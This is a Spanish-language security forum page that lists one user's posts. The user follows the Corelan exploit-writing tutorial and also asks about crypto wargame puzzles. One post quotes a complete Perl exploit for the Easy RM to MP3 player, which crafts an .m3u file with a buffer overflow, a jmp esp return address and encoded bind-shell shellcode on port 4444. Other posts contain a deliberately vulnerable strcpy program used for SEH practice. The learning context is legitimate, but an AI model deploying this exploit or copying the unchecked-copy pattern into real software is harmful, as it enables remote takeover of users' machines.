últimos mensajes de: rafael_lior

Mostrar Mensajes
Páginas: [1]

1	Seguridad Informática / Bugs y Exploits / Re: Problemas con un SEHTEST	en: 30 Noviembre 2016, 22:23 pm
Disculpa por ser insistente pero me puedes dar un ejemplo para poder guiarme. Gracias

Seguridad Informática / Bugs y Exploits / Re: Problemas con un SEHTEST

en: 30 Noviembre 2016, 19:57 pm

Este es el codigo, que quiero compilar, ya observe la sintaxis , pero aun no me compila

Código

#include<stdio.h>
#include<string.h>
#include<windows.h>
 
int ExceptionHandler(void);
int main(int argc,char *argv[]){
 
char temp[512];
 
printf("Application launched");
 
__try {
    strcpy(temp,argv[1]);
    }__except ( ExceptionHandler() ){
}
return 0;
}
int ExceptionHandler(void){
printf("Exception");
return 0;
}

Mod: Los códigos deben ir en etiquetas GeSHi

3	Seguridad Informática / Bugs y Exploits / Problemas con un SEHTEST	en: 30 Noviembre 2016, 19:49 pm
Estimado estoy intentando compilar este codigo hecho en C, pero me cota un error, espero que me ayude, para seguir con el manual de Corelean de Creacion de Exploit. Gracias por su ayuda.

Seguridad Informática / Bugs y Exploits / Re: Creación de Exploits 1 por corelanc0d3r

en: 30 Noviembre 2016, 19:43 pm

Justamente estaba pensando que er tema de idioma del S.O , porque para las pruebas uso un Windows XP SP3 en Español, sin embargo el exploit esta en Ingles, cuando lo cambie de idioma, me seguia presentado el mismo error, a pesar de que se abrio el puerto 4444, en modo listening, por lo que yo creo es que me falta habilitar el telnet y asi pueda ingresar , No estoy seguro con mi teoria. Espero un apoyo. Gracias.

Código

# Exploit for Easy RM to MP3 27.3.700 vulnerability, discovered by Crazy_Hacker
# Written by Peter Van Eeckhoutte
# http://www.corelan.be
# Greetings to Saumil and SK :-)
#
# tested on Windows XP SP3 (En)
#
#
#
my $file= "exploitrmtomp12.m3u";
 
my $junk= "A" x 26042;
my $eip = pack('V',0x01d4f23a);  #jmp esp from MSRMCcodec02.dll
 
my $shellcode = "\x90" x 25;
 
# windows/shell_bind_tcp - 703 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_upper
# EXITFUNC=seh, LPORT=4444, RHOST=
$shellcode=$shellcode."\x89\xe1\xdb\xd4\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49" .
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56" .
"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41" .
"\x42\x41\x41\x42\x54\x00\x41\x51\x32\x41\x42\x32\x42\x42" .
"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x42" .
"\x4a\x4a\x4b\x50\x4d\x4b\x58\x4c\x39\x4b\x4f\x4b\x4f\x4b" .
"\x4f\x43\x50\x4c\x4b\x42\x4c\x51\x34\x51\x34\x4c\x4b\x47" .
"\x35\x47\x4c\x4c\x4b\x43\x4c\x44\x45\x44\x38\x45\x51\x4a" .
"\x4f\x4c\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x51\x30\x43" .
"\x31\x4a\x4b\x50\x49\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a" .
"\x4e\x46\x51\x49\x50\x4a\x39\x4e\x4c\x4d\x54\x49\x50\x44" .
"\x34\x45\x57\x49\x51\x49\x5a\x44\x4d\x43\x31\x49\x52\x4a" .
"\x4b\x4a\x54\x47\x4b\x51\x44\x51\x34\x47\x58\x44\x35\x4a" .
"\x45\x4c\x4b\x51\x4f\x47\x54\x43\x31\x4a\x4b\x45\x36\x4c" .
"\x4b\x44\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x45\x51\x4a" .
"\x4b\x44\x43\x46\x4c\x4c\x4b\x4d\x59\x42\x4c\x46\x44\x45" .
"\x4c\x43\x51\x48\x43\x46\x51\x49\x4b\x45\x34\x4c\x4b\x50" .
"\x43\x50\x30\x4c\x4b\x51\x50\x44\x4c\x4c\x4b\x42\x50\x45" .
"\x4c\x4e\x4d\x4c\x4b\x51\x50\x45\x58\x51\x4e\x43\x58\x4c" .
"\x4e\x50\x4e\x44\x4e\x4a\x4c\x50\x50\x4b\x4f\x48\x56\x43" .
"\x56\x50\x53\x45\x36\x45\x38\x50\x33\x50\x32\x42\x48\x43" .
"\x47\x43\x43\x47\x42\x51\x4f\x50\x54\x4b\x4f\x48\x50\x42" .
"\x48\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x50\x50\x4b\x4f\x48" .
"\x56\x51\x4f\x4d\x59\x4d\x35\x45\x36\x4b\x31\x4a\x4d\x43" .
"\x38\x43\x32\x46\x35\x43\x5a\x44\x42\x4b\x4f\x4e\x30\x42" .
"\x48\x48\x59\x45\x59\x4c\x35\x4e\x4d\x50\x57\x4b\x4f\x48" .
"\x56\x46\x33\x46\x33\x46\x33\x50\x53\x50\x53\x50\x43\x51" .
"\x43\x51\x53\x46\x33\x4b\x4f\x4e\x30\x43\x56\x45\x38\x42" .
"\x31\x51\x4c\x42\x46\x46\x33\x4c\x49\x4d\x31\x4a\x35\x42" .
"\x48\x4e\x44\x44\x5a\x44\x30\x49\x57\x50\x57\x4b\x4f\x48" .
"\x56\x43\x5a\x44\x50\x50\x51\x51\x45\x4b\x4f\x4e\x30\x43" .
"\x58\x49\x34\x4e\x4d\x46\x4e\x4b\x59\x50\x57\x4b\x4f\x4e" .
"\x36\x50\x53\x46\x35\x4b\x4f\x4e\x30\x42\x48\x4d\x35\x50" .
"\x49\x4d\x56\x50\x49\x51\x47\x4b\x4f\x48\x56\x50\x50\x50" .
"\x54\x50\x54\x46\x35\x4b\x4f\x48\x50\x4a\x33\x45\x38\x4a" .
"\x47\x44\x39\x48\x46\x43\x49\x50\x57\x4b\x4f\x48\x56\x50" .
"\x55\x4b\x4f\x48\x50\x42\x46\x42\x4a\x42\x44\x45\x36\x45" .
"\x38\x45\x33\x42\x4d\x4d\x59\x4b\x55\x42\x4a\x46\x30\x50" .
"\x59\x47\x59\x48\x4c\x4b\x39\x4a\x47\x43\x5a\x50\x44\x4b" .
"\x39\x4b\x52\x46\x51\x49\x50\x4c\x33\x4e\x4a\x4b\x4e\x47" .
"\x32\x46\x4d\x4b\x4e\x51\x52\x46\x4c\x4d\x43\x4c\x4d\x42" .
"\x5a\x50\x38\x4e\x4b\x4e\x4b\x4e\x4b\x43\x58\x42\x52\x4b" .
"\x4e\x4e\x53\x42\x36\x4b\x4f\x43\x45\x51\x54\x4b\x4f\x49" .
"\x46\x51\x4b\x46\x37\x46\x32\x50\x51\x50\x51\x46\x31\x42" .
"\x4a\x45\x51\x46\x31\x46\x31\x51\x45\x50\x51\x4b\x4f\x48" .
"\x50\x43\x58\x4e\x4d\x4e\x39\x45\x55\x48\x4e\x51\x43\x4b" .
"\x4f\x49\x46\x43\x5a\x4b\x4f\x4b\x4f\x47\x47\x4b\x4f\x48" .
"\x50\x4c\x4b\x46\x37\x4b\x4c\x4c\x43\x49\x54\x45\x34\x4b" .
"\x4f\x4e\x36\x50\x52\x4b\x4f\x48\x50\x43\x58\x4c\x30\x4c" .
"\x4a\x44\x44\x51\x4f\x46\x33\x4b\x4f\x48\x56\x4b\x4f\x48" .
"\x50\x41\x41";
 
open($FILE,">$file");
print $FILE $junk.$eip.$shellcode;
close($FILE);
print "m3u File Created successfully\n";

Mod: Códigos van entre etiquetas GeSHi.

5	Programación / Programación C/C++ / Exploit Writing de Corelan, capitulo 3	en: 30 Noviembre 2016, 18:14 pm
Buenass tardes, tengo probleas con un codigo, estoy siguiendo el manual de Exploit Writing de Corelan, estoy en el capitulo 3, en donde muestra SEH, y me brinda un codigo C, lo compilo y me sale error. les adjunto la foto , posdata el codigo es : Código #include<stdio.h> #include<string.h> #include<windows.h> int ExceptionHandler(void); int main(int argc,char argv[]){ char temp[512]; printf("Application launched"); __try { strcpy(temp,argv[1]); } __except ( ExceptionHandler() ){ } return 0; } int ExceptionHandler(void){ printf("Exception"); return 0; } ESPERO SU APOYO. GRACIAS Mod: Los códigos deben ir en etiquetas GeSHi, los titulos deben ser descriptivos, tema movido*

6	Seguridad Informática / Bugs y Exploits / Creación de Exploits 1 por corelanc0d3r	en: 27 Noviembre 2016, 16:36 pm
Buenas dias, estuve leyendo el manual de creacion de exploit de corelancoder, del capitulo me quede en ingresar una shellcode para ingresar por via telnet. sin embargo no me funciona abre el puerto pero cuando intento ingresar por putty a ese servicio telnet. no puedo.

7	Seguridad Informática / Desafíos - Wargames / Re: Ayuda en Criptografia Leonardo de pisa	en: 6 Abril 2015, 04:25 am
Justamente por lo que leí se podría usar el número de oro , que podría buscar la letra mas cercano y así con la secuencia de fibonacci encontrarlo es un reto criptologico , en warzone de esta web

8	Seguridad Informática / Desafíos - Wargames / Re: Ayuda en Criptografia Leonardo de pisa	en: 5 Abril 2015, 12:57 pm
Gracias Lo voy a leer detalladamente , consulta quiero descifrar un mensaje , pero al momento de realizarlo no sale un mensaje claro. El msj es este: matienymustianbastentiqueabmusolrirstuvnqueilscontresccamorquesnnuncaabulsoksqeucnslsiaa

9	Seguridad Informática / Desafíos - Wargames / Ayuda en Criptografia Leonardo de pisa	en: 5 Abril 2015, 12:12 pm
Lei la teoria pero no tengo ni idea de como aplicarlo. ayuda por fa

10	Seguridad Informática / WarZone / Re: Criptografia_0	en: 5 Abril 2015, 09:46 am
Lo resolvi pero me sale dos codigos ASCII que no tiene coincidencia, por favor una pista

Páginas: [1]